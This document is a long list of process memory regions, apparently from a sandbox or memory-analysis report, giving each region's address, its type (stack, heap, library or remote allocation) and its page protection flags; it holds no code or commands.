27DF000
|
stack
|
page read and write
|
||
|
5CCE000
|
stack
|
page read and write
|
||
|
4BDD000
|
stack
|
page read and write
|
||
|
7D7000
|
heap
|
page read and write
|
||
|
A0000
|
trusted library allocation
|
page read and write
|
||
|
77D000
|
stack
|
page read and write
|
||
|
545D000
|
heap
|
page read and write
|
||
|
497000
|
heap
|
page read and write
|
||
|
630A000
|
trusted library allocation
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
54C000
|
stack
|
page read and write
|
||
|
5D3D000
|
stack
|
page read and write
|
||
|
22B5000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
23EF000
|
stack
|
page read and write
|
||
|
221E000
|
stack
|
page read and write | page guard
|
||
|
5CD4000
|
heap
|
page read and write
|
||
|
56C0000
|
heap
|
page read and write
|
||
|
67E3000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
51C0000
|
heap
|
page read and write
|
||
|
89000
|
stack
|
page read and write
|
||
|
EB000
|
stack
|
page read and write
|
||
|
57E000
|
stack
|
page read and write
|
||
|
8E0000
|
heap
|
page read and write
|
||
|
22BC000
|
trusted library allocation
|
page read and write
|
||
|
3969000
|
trusted library allocation
|
page read and write
|
||
|
711000
|
heap
|
page read and write
|
||
|
BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
163000
|
trusted library allocation
|
page execute and read and write
|
||
|
250000
|
trusted library allocation
|
page read and write
|
||
|
5F80000
|
heap
|
page read and write
|
||
|
4362000
|
heap
|
page read and write
|
||
|
898000
|
heap
|
page read and write
|
||
|
59C0000
|
heap
|
page read and write
|
||
|
F9B000
|
stack
|
page read and write
|
||
|
430E000
|
stack
|
page read and write
|
||
|
3281000
|
trusted library allocation
|
page read and write
|
||
|
5D4E000
|
stack
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
17D000
|
trusted library allocation
|
page execute and read and write
|
||
|
21E3000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
4842000
|
heap
|
page read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
B0000
|
trusted library allocation
|
page read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
72D000
|
stack
|
page read and write
|
||
|
21CE000
|
trusted library allocation
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
213F000
|
trusted library allocation
|
page read and write
|
||
|
15D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D4000
|
heap
|
page read and write
|
||
|
290000
|
trusted library allocation
|
page read and write
|
||
|
2B3B000
|
heap
|
page read and write
|
||
|
2101000
|
trusted library allocation
|
page read and write
|
||
|
2FF3000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
238D000
|
trusted library allocation
|
page read and write
|
||
|
4734000
|
heap
|
page read and write
|
||
|
3FD000
|
stack
|
page read and write
|
||
|
25C0000
|
heap
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
27D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EE2000
|
heap
|
page read and write
|
||
|
897000
|
heap
|
page read and write
|
||
|
134E000
|
stack
|
page read and write
|
||
|
550E000
|
stack
|
page read and write
|
||
|
2281000
|
trusted library allocation
|
page read and write
|
||
|
389000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
47CD000
|
stack
|
page read and write
|
||
|
4C1D000
|
stack
|
page read and write
|
||
|
1F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
110000
|
trusted library allocation
|
page read and write
|
||
|
520E000
|
stack
|
page read and write
|
||
|
21B000
|
trusted library allocation
|
page execute and read and write
|
||
|
495F000
|
stack
|
page read and write
|
||
|
370000
|
trusted library allocation
|
page read and write
|
||
|
280000
|
trusted library allocation
|
page read and write
|
||
|
186000
|
trusted library allocation
|
page execute and read and write
|
||
|
89B000
|
heap
|
page read and write
|
||
|
26D000
|
trusted library allocation
|
page execute and read and write
|
||
|
757000
|
heap
|
page read and write
|
||
|
180000
|
trusted library allocation
|
page read and write
|
||
|
6F7000
|
heap
|
page read and write
|
||
|
5D80000
|
heap
|
page read and write
|
||
|
5820000
|
heap
|
page read and write
|
||
|
1A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
299000
|
trusted library allocation
|
page read and write
|
||
|
18D000
|
trusted library allocation
|
page execute and read and write
|
||
|
431E000
|
stack
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FC0000
|
heap
|
page read and write
|
||
|
537E000
|
stack
|
page read and write
|
||
|
173000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
82D000
|
heap
|
page read and write
|
||
|
228B000
|
trusted library allocation
|
page read and write
|
||
|
19A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2364000
|
trusted library allocation
|
page read and write
|
||
|
873000
|
heap
|
page read and write
|
||
|
884000
|
heap
|
page read and write
|
||
|
2B1E000
|
stack
|
page read and write
|
||
|
22EA000
|
trusted library allocation
|
page read and write
|
||
|
82F000
|
heap
|
page read and write
|
||
|
AC0000
|
trusted library allocation
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
638000
|
trusted library allocation
|
page read and write
|
||
|
247000
|
stack
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
4EDE000
|
stack
|
page read and write
|
||
|
264000
|
trusted library allocation
|
page read and write
|
||
|
1EC0000
|
heap
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
6DE000
|
stack
|
page read and write
|
||
|
164000
|
trusted library allocation
|
page read and write
|
||
|
55E000
|
stack
|
page read and write
|
||
|
9CE000
|
stack
|
page read and write
|
||
|
240F000
|
stack
|
page read and write
|
||
|
568C000
|
stack
|
page read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
73EE000
|
stack
|
page read and write
|
||
|
5E2F000
|
stack
|
page read and write
|
||
|
4E3E000
|
stack
|
page read and write
|
||
|
4C6000
|
heap
|
page read and write
|
||
|
5D00000
|
heap
|
page read and write
|
||
|
51DE000
|
stack
|
page read and write
|
||
|
62B1000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
59A8000
|
heap
|
page read and write
|
||
|
AD0000
|
trusted library allocation
|
page read and write
|
||
|
96E000
|
stack
|
page read and write
|
||
|
89B000
|
heap
|
page read and write
|
||
|
216000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BF000
|
heap
|
page read and write
|
||
|
227F000
|
stack
|
page read and write
|
||
|
263000
|
trusted library allocation
|
page execute and read and write
|
||
|
53E000
|
stack
|
page read and write
|
||
|
5B70000
|
heap
|
page read and write
|
||
|
24AA000
|
trusted library allocation
|
page read and write
|
||
|
5F3E000
|
stack
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
571D000
|
heap
|
page read and write
|
||
|
1A0000
|
remote allocation
|
page read and write
|
||
|
592E000
|
stack
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
416D000
|
stack
|
page read and write
|
||
|
57E000
|
heap
|
page read and write
|
||
|
5800000
|
heap
|
page read and write
|
||
|
2320000
|
trusted library allocation
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
59BF000
|
stack
|
page read and write
|
||
|
1D90000
|
heap
|
page read and write
|
||
|
47FD000
|
stack
|
page read and write
|
||
|
3F70000
|
trusted library allocation
|
page read and write
|
||
|
2135000
|
trusted library allocation
|
page read and write
|
||
|
5B7E000
|
stack
|
page read and write
|
||
|
5870000
|
heap
|
page read and write
|
||
|
658000
|
trusted library allocation
|
page read and write
|
||
|
217000
|
trusted library allocation
|
page execute and read and write
|
||
|
234E000
|
trusted library allocation
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
18A000
|
trusted library allocation
|
page execute and read and write
|
||
|
3940000
|
heap
|
page read and write
|
||
|
1CC000
|
stack
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
487D000
|
stack
|
page read and write
|
||
|
471000
|
heap
|
page read and write
|
||
|
286000
|
trusted library allocation
|
page execute and read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
trusted library allocation
|
page read and write
|
||
|
22EC000
|
trusted library allocation
|
page read and write
|
||
|
292000
|
trusted library allocation
|
page read and write
|
||
|
244000
|
heap
|
page read and write
|
||
|
378F000
|
stack
|
page read and write
|
||
|
618E000
|
stack
|
page read and write
|
||
|
5620000
|
heap
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
531E000
|
stack
|
page read and write
|
||
|
228E000
|
stack
|
page read and write
|
||
|
2846000
|
trusted library allocation
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
260000
|
trusted library allocation
|
page read and write
|
||
|
30B000
|
heap
|
page read and write
|
||
|
22B000
|
trusted library allocation
|
page execute and read and write
|
||
|
575E000
|
stack
|
page read and write
|
||
|
3962000
|
trusted library allocation
|
page read and write
|
||
|
564F000
|
stack
|
page read and write
|
||
|
5D91000
|
heap
|
page read and write
|
||
|
2CD0000
|
heap
|
page read and write
|
||
|
A0E000
|
stack
|
page read and write
|
||
|
470000
|
trusted library allocation
|
page execute and read and write
|
||
|
5FC0000
|
trusted library allocation
|
page read and write
|
||
|
6E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
8DE000
|
heap
|
page read and write
|
||
|
884000
|
heap
|
page read and write
|
||
|
22FF000
|
trusted library allocation
|
page read and write
|
||
|
21C0000
|
heap
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
16D000
|
trusted library allocation
|
page execute and read and write
|
||
|
138E000
|
stack
|
page read and write
|
||
|
6D0000
|
trusted library allocation
|
page read and write
|
||
|
2415000
|
trusted library allocation
|
page read and write
|
||
|
25DD000
|
heap
|
page read and write
|
||
|
425F000
|
stack
|
page read and write
|
||
|
2ADF000
|
stack
|
page read and write
|
||
|
930000
|
heap
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
56C0000
|
heap
|
page read and write
|
||
|
3F70000
|
trusted library allocation
|
page read and write
|
||
|
A3E000
|
stack
|
page read and write
|
||
|
22D4000
|
trusted library allocation
|
page read and write
|
||
|
154000
|
trusted library allocation
|
page read and write
|
||
|
41CE000
|
stack
|
page read and write
|
||
|
3101000
|
trusted library allocation
|
page read and write
|
||
|
4DE000
|
heap
|
page read and write
|
||
|
3D2000
|
heap
|
page read and write
|
||
|
3B40000
|
heap
|
page read and write
|
||
|
57FE000
|
stack
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write | page guard
|
||
|
5F6C000
|
stack
|
page read and write
|
||
|
210D000
|
stack
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
2B38000
|
heap
|
page read and write
|
||
|
4DDD000
|
stack
|
page read and write
|
||
|
2940000
|
trusted library allocation
|
page read and write
|
||
|
5F40000
|
heap
|
page read and write
|
||
|
539D000
|
heap
|
page read and write
|
||
|
3221000
|
trusted library allocation
|
page read and write
|
||
|
83C000
|
heap
|
page read and write
|
||
|
185000
|
trusted library allocation
|
page execute and read and write
|
||
|
23E1000
|
trusted library allocation
|
page read and write
|
||
|
9A0000
|
heap
|
page execute and read and write
|
||
|
137000
|
heap
|
page read and write
|
||
|
8C5000
|
heap
|
page read and write
|
||
|
222000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
5950000
|
heap
|
page read and write
|
||
|
22B1000
|
trusted library allocation
|
page read and write
|
||
|
E40000
|
trusted library allocation
|
page execute and read and write
|
||
|
8BF000
|
heap
|
page read and write
|
||
|
24BC000
|
trusted library allocation
|
page read and write
|
||
|
5F6E000
|
stack
|
page read and write
|
||
|
279000
|
stack
|
page read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
7EF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CE000
|
stack
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
555D000
|
heap
|
page read and write
|
||
|
2B6F000
|
trusted library allocation
|
page read and write
|
||
|
580000
|
heap
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
889000
|
heap
|
page read and write
|
||
|
3419000
|
trusted library allocation
|
page read and write
|
||
|
24CD000
|
trusted library allocation
|
page read and write
|
||
|
7DE000
|
heap
|
page read and write
|
||
|
8CA000
|
heap
|
page read and write
|
||
|
59F0000
|
heap
|
page read and write
|
||
|
884000
|
heap
|
page read and write
|
||
|
986000
|
heap
|
page read and write
|
||
|
1020000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D60000
|
heap
|
page read and write
|
||
|
1FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
837000
|
heap
|
page read and write
|
||
|
24BD000
|
trusted library allocation
|
page read and write
|
||
|
570A000
|
heap
|
page read and write
|
||
|
2494000
|
trusted library allocation
|
page read and write
|
||
|
18A000
|
stack
|
page read and write
|
||
|
AE0000
|
trusted library allocation
|
page read and write
|
||
|
40E000
|
stack
|
page read and write
|
||
|
633F000
|
trusted library allocation
|
page read and write
|
||
|
2336000
|
trusted library allocation
|
page read and write
|
||
|
490000
|
heap
|
page read and write
|
||
|
61DE000
|
stack
|
page read and write
|
||
|
ECE000
|
stack
|
page read and write
|
||
|
A60000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B0000
|
heap
|
page execute and read and write
|
||
|
297000
|
trusted library allocation
|
page read and write
|
||
|
541E000
|
stack
|
page read and write
|
||
|
502F000
|
stack
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
119C000
|
stack
|
page read and write
|
||
|
170000
|
trusted library allocation
|
page read and write
|
||
|
24B8000
|
trusted library allocation
|
page read and write
|
||
|
192000
|
trusted library allocation
|
page read and write
|
||
|
744000
|
heap
|
page read and write
|
||
|
9D0000
|
trusted library allocation
|
page read and write
|
||
|
270E000
|
stack
|
page read and write
|
||
|
3F0000
|
trusted library allocation
|
page read and write
|
||
|
888000
|
heap
|
page read and write
|
||
|
4CBE000
|
stack
|
page read and write
|
||
|
4DEF000
|
stack
|
page read and write
|
||
|
21BD000
|
trusted library allocation
|
page read and write
|
||
|
24B000
|
stack
|
page read and write
|
||
|
4E2F000
|
stack
|
page read and write
|
||
|
4B6D000
|
stack
|
page read and write
|
||
|
4DE000
|
heap
|
page read and write
|
||
|
884000
|
heap
|
page read and write
|
||
|
4BA0000
|
heap
|
page read and write
|
||
|
8E1000
|
heap
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
9AD000
|
stack
|
page read and write
|
||
|
52ED000
|
heap
|
page read and write
|
||
|
99D000
|
stack
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
CAE000
|
stack
|
page read and write
|
||
|
3829000
|
trusted library allocation
|
page read and write
|
||
|
4F3E000
|
stack
|
page read and write
|
||
|
17D000
|
trusted library allocation
|
page execute and read and write
|
||
|
19B000
|
trusted library allocation
|
page execute and read and write
|
||
|
6300000
|
trusted library allocation
|
page read and write
|
||
|
55ED000
|
stack
|
page read and write
|
||
|
196000
|
trusted library allocation
|
page execute and read and write
|
||
|
89C000
|
heap
|
page read and write
|
||
|
F2B000
|
stack
|
page read and write
|
||
|
456000
|
stack
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
4F5D000
|
heap
|
page read and write
|
||
|
106F000
|
stack
|
page read and write
|
||
|
4D8C000
|
stack
|
page read and write
|
||
|
213E000
|
stack
|
page read and write
|
||
|
1EC4000
|
heap
|
page read and write
|
||
|
4EEC000
|
stack
|
page read and write
|
||
|
182000
|
trusted library allocation
|
page read and write
|
||
|
440E000
|
stack
|
page read and write
|
||
|
4D8E000
|
stack
|
page read and write
|
||
|
563A000
|
heap
|
page read and write
|
||
|
5ECE000
|
stack
|
page read and write
|
||
|
33F1000
|
trusted library allocation
|
page read and write
|
||
|
36E000
|
heap
|
page read and write
|
||
|
879000
|
heap
|
page read and write
|
||
|
588000
|
heap
|
page read and write
|
||
|
236D000
|
trusted library allocation
|
page read and write
|
||
|
5DEE000
|
stack
|
page read and write
|
||
|
197000
|
trusted library allocation
|
page execute and read and write
|
||
|
980000
|
trusted library allocation
|
page read and write
|
||
|
561D000
|
stack
|
page read and write
|
||
|
140000
|
heap
|
page read and write
|
||
|
52CE000
|
stack
|
page read and write
|
||
|
6F0000
|
heap
|
page execute and read and write
|
||
|
2CF000
|
heap
|
page read and write
|
||
|
540000
|
heap
|
page execute and read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
597E000
|
stack
|
page read and write
|
||
|
3F6E000
|
stack
|
page read and write
|
||
|
4C0000
|
heap
|
page read and write
|
||
|
2A0000
|
heap
|
page read and write
|
||
|
B4000
|
trusted library allocation
|
page read and write
|
||
|
22DD000
|
trusted library allocation
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
222C000
|
trusted library allocation
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
50EE000
|
stack
|
page read and write
|
||
|
45D000
|
heap
|
page read and write
|
||
|
585000
|
heap
|
page read and write
|
||
|
598000
|
trusted library allocation
|
page read and write
|
||
|
57B0000
|
heap
|
page read and write
|
||
|
192000
|
trusted library allocation
|
page read and write
|
||
|
237E000
|
trusted library allocation
|
page read and write
|
||
|
491000
|
heap
|
page read and write
|
||
|
148000
|
stack
|
page read and write
|
||
|
5840000
|
heap
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
2348000
|
trusted library allocation
|
page read and write
|
||
|
5534000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
56FD000
|
stack
|
page read and write
|
||
|
50D000
|
heap
|
page read and write
|
||
|
28A000
|
trusted library allocation
|
page execute and read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
880000
|
heap
|
page read and write
|
||
|
11DA000
|
stack
|
page read and write
|
||
|
380000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
857000
|
heap
|
page read and write
|
||
|
5380000
|
heap
|
page read and write
|
||
|
4B4E000
|
stack
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
45C000
|
stack
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
3409000
|
trusted library allocation
|
page read and write
|
||
|
3F1B000
|
trusted library allocation
|
page read and write
|
||
|
17A000
|
stack
|
page read and write
|
||
|
296000
|
trusted library allocation
|
page execute and read and write
|
||
|
885000
|
heap
|
page read and write
|
||
|
124000
|
trusted library allocation
|
page read and write
|
||
|
200000
|
trusted library allocation
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
3C50000
|
heap
|
page read and write
|
||
|
217000
|
heap
|
page read and write
|
||
|
22B9000
|
trusted library allocation
|
page read and write
|
||
|
89F000
|
heap
|
page read and write
|
||
|
797000
|
heap
|
page read and write
|
||
|
4FBC000
|
stack
|
page read and write
|
||
|
4344000
|
heap
|
page read and write
|
||
|
A92000
|
heap
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
A70000
|
heap
|
page execute and read and write
|
||
|
81E000
|
heap
|
page read and write
|
||
|
23EB000
|
trusted library allocation
|
page read and write
|
||
|
9B1000
|
trusted library allocation
|
page read and write
|
||
|
47AD000
|
stack
|
page read and write
|
||
|
24A4000
|
trusted library allocation
|
page read and write
|
||
|
6CE000
|
stack
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
21A0000
|
trusted library allocation
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
4A0000
|
heap
|
page read and write
|
||
|
1A2000
|
trusted library allocation
|
page read and write
|
||
|
83F000
|
heap
|
page read and write
|
||
|
551F000
|
heap
|
page read and write
|
||
|
84F000
|
heap
|
page read and write
|
||
|
762000
|
heap
|
page read and write
|
||
|
5E2E000
|
stack
|
page read and write | page guard
|
||
|
153000
|
trusted library allocation
|
page execute and read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
30E000
|
heap
|
page read and write
|
||
|
576E000
|
stack
|
page read and write
|
||
|
89F000
|
heap
|
page read and write
|
||
|
835000
|
heap
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
22FC000
|
trusted library allocation
|
page read and write
|
||
|
8C5000
|
heap
|
page read and write
|
||
|
54F0000
|
heap
|
page read and write
|
||
|
210B000
|
trusted library allocation
|
page read and write
|
||
|
3F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F00000
|
heap
|
page read and write
|
||
|
500B000
|
heap
|
page read and write
|
||
|
2221000
|
trusted library allocation
|
page read and write
|
||
|
922000
|
heap
|
page read and write
|
||
|
6070000
|
trusted library allocation
|
page read and write
|
||
|
5B90000
|
heap
|
page read and write
|
||
|
7CE000
|
stack
|
page read and write
|
||
|
3249000
|
trusted library allocation
|
page read and write
|
||
|
4752000
|
heap
|
page read and write
|
||
|
877000
|
heap
|
page read and write
|
||
|
278000
|
trusted library allocation
|
page read and write
|
||
|
5E60000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
24A8000
|
trusted library allocation
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
3E3E000
|
stack
|
page read and write
|
||
|
866000
|
heap
|
page read and write
|
||
|
51A0000
|
heap
|
page read and write
|
||
|
24AD000
|
trusted library allocation
|
page read and write
|
||
|
680000
|
heap
|
page execute and read and write
|
||
|
89B000
|
heap
|
page read and write
|
||
|
5C7D000
|
stack
|
page read and write
|
||
|
450000
|
trusted library allocation
|
page execute and read and write
|
||
|
5D60000
|
heap
|
page read and write
|
||
|
587000
|
heap
|
page read and write
|
||
|
A5E000
|
stack
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
873000
|
heap
|
page read and write
|
||
|
5FC0000
|
trusted library allocation
|
page read and write
|
||
|
235D000
|
trusted library allocation
|
page read and write
|
||
|
480E000
|
stack
|
page read and write
|
||
|
260000
|
trusted library allocation
|
page read and write
|
||
|
4CDC000
|
stack
|
page read and write
|
||
|
9CD000
|
stack
|
page read and write
|
||
|
953000
|
heap
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
59D000
|
stack
|
page read and write
|
||
|
B30000
|
trusted library allocation
|
page read and write
|
||
|
2B6A000
|
trusted library allocation
|
page read and write
|
||
|
5B0000
|
heap
|
page read and write
|
||
|
873000
|
heap
|
page read and write
|
||
|
593C000
|
stack
|
page read and write
|
||
|
2109000
|
trusted library allocation
|
page read and write
|
||
|
519D000
|
stack
|
page read and write
|
||
|
4C8D000
|
stack
|
page read and write
|
||
|
5FC0000
|
trusted library allocation
|
page read and write
|
||
|
8CB000
|
heap
|
page read and write
|
||
|
7EF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
380000
|
trusted library allocation
|
page read and write
|
||
|
2010000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
24CF000
|
trusted library allocation
|
page read and write
|
||
|
42FE000
|
stack
|
page read and write
|
||
|
378000
|
heap
|
page read and write
|
||
|
484F000
|
stack
|
page read and write
|
||
|
21B4000
|
trusted library allocation
|
page read and write
|
||
|
470D000
|
stack
|
page read and write
|
||
|
4820000
|
heap
|
page read and write
|
||
|
4D0D000
|
stack
|
page read and write
|
||
|
281E000
|
stack
|
page read and write
|
||
|
892000
|
heap
|
page read and write
|
||
|
873000
|
heap
|
page read and write
|
||
|
553E000
|
stack
|
page read and write
|
||
|
88F000
|
heap
|
page read and write
|
||
|
83F000
|
heap
|
page read and write
|
||
|
360000
|
trusted library allocation
|
page execute and read and write
|
||
|
32A9000
|
trusted library allocation
|
page read and write
|
||
|
20D000
|
trusted library allocation
|
page execute and read and write
|
||
|
219C000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
1A0000
|
remote allocation
|
page read and write
|
||
|
42AE000
|
stack
|
page read and write
|
||
|
12A000
|
stack
|
page read and write
|
||
|
2801000
|
trusted library allocation
|
page read and write
|
||
|
BFF000
|
stack
|
page read and write
|
||
|
622E000
|
stack
|
page read and write
|
||
|
4E51000
|
heap
|
page read and write
|
||
|
5C3E000
|
stack
|
page read and write
|
||
|
5E6F000
|
stack
|
page read and write
|
||
|
4340000
|
heap
|
page read and write
|
||
|
1BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
3801000
|
trusted library allocation
|
page read and write
|
||
|
24BA000
|
trusted library allocation
|
page read and write
|
||
|
855000
|
heap
|
page read and write
|
||
|
2F20000
|
heap
|
page read and write
|
||
|
33E1000
|
trusted library allocation
|
page read and write
|
||
|
89B000
|
heap
|
page read and write
|
||
|
297000
|
trusted library allocation
|
page execute and read and write
|
||
|
537E000
|
stack
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
178000
|
trusted library allocation
|
page read and write
|
||
|
1F4000
|
trusted library allocation
|
page read and write
|
||
|
5700000
|
heap
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
836000
|
heap
|
page read and write
|
||
|
4B4000
|
heap
|
page read and write
|
||
|
5ABF000
|
stack
|
page read and write
|
||
|
22E5000
|
trusted library allocation
|
page read and write
|
||
|
21A000
|
trusted library allocation
|
page execute and read and write
|
||
|
480E000
|
stack
|
page read and write
|
||
|
A4D000
|
stack
|
page read and write
|
||
|
9A2000
|
trusted library allocation
|
page read and write
|
||
|
30000
|
heap
|
page read and write
|
||
|
5CDE000
|
stack
|
page read and write
|
||
|
4E4000
|
heap
|
page read and write
|
||
|
F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
250000
|
trusted library allocation
|
page execute and read and write
|
||
|
865000
|
heap
|
page read and write
|
||
|
22DE000
|
stack
|
page read and write
|
||
|
3F70000
|
trusted library allocation
|
page read and write
|
||
|
5CFF000
|
stack
|
page read and write
|
||
|
212000
|
trusted library allocation
|
page read and write
|
||
|
4F50000
|
heap
|
page read and write
|
||
|
12E000
|
stack
|
page read and write
|
||
|
877000
|
heap
|
page read and write
|
||
|
490000
|
heap
|
page execute and read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
22E8000
|
trusted library allocation
|
page read and write
|
||
|
4FAF000
|
stack
|
page read and write
|
||
|
6F0000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
234A000
|
trusted library allocation
|
page read and write
|
||
|
8C5000
|
heap
|
page read and write
|
||
|
875000
|
heap
|
page read and write
|
||
|
2DF000
|
stack
|
page read and write
|
||
|
43E000
|
remote allocation
|
page execute and read and write
|
||
|
22BB000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
2A9E000
|
stack
|
page read and write
|
||
|
87F000
|
heap
|
page read and write
|
||
|
FD6000
|
heap
|
page execute and read and write
|
||
|
865000
|
heap
|
page read and write
|
||
|
480000
|
trusted library allocation
|
page execute and read and write
|
||
|
5440000
|
heap
|
page read and write
|
||
|
7E1000
|
heap
|
page read and write
|
||
|
5DB0000
|
heap
|
page read and write
|
||
|
2AFA000
|
trusted library allocation
|
page read and write
|
||
|
5AFD000
|
stack
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
470000
|
trusted library allocation
|
page read and write
|
||
|
2FD000
|
heap
|
page read and write
|
||
|
2A7000
|
heap
|
page read and write
|
||
|
FD0000
|
heap
|
page execute and read and write
|
||
|
3DF000
|
stack
|
page read and write
|
||
|
206000
|
trusted library allocation
|
page execute and read and write
|
||
|
8E4000
|
heap
|
page read and write
|
||
|
2A2000
|
trusted library allocation
|
page read and write
|
||
|
12FE000
|
stack
|
page read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
250000
|
trusted library allocation
|
page execute and read and write
|
||
|
5E8D000
|
stack
|
page read and write
|
||
|
202000
|
trusted library allocation
|
page read and write
|
||
|
210000
|
heap
|
page read and write
|
||
|
53D000
|
stack
|
page read and write
|
||
|
867000
|
heap
|
page read and write
|
||
|
FB0000
|
trusted library allocation
|
page read and write
|
||
|
41D000
|
heap
|
page read and write
|
||
|
8D3000
|
heap
|
page read and write
|
||
|
837000
|
heap
|
page read and write
|
||
|
865000
|
heap
|
page read and write
|
||
|
188000
|
trusted library allocation
|
page read and write
|
||
|
E8E000
|
stack
|
page read and write
|
||
|
234C000
|
trusted library allocation
|
page read and write
|
||
|
231C000
|
trusted library allocation
|
page read and write
|
||
|
8D4000
|
heap
|
page read and write
|
||
|
21E0000
|
trusted library allocation
|
page read and write
|
||
|
2378000
|
trusted library allocation
|
page read and write
|
||
|
21BE000
|
stack
|
page read and write
|
||
|
52D000
|
heap
|
page read and write
|
||
|
4CCF000
|
stack
|
page read and write
|
||
|
B6A000
|
heap
|
page read and write
|
||
|
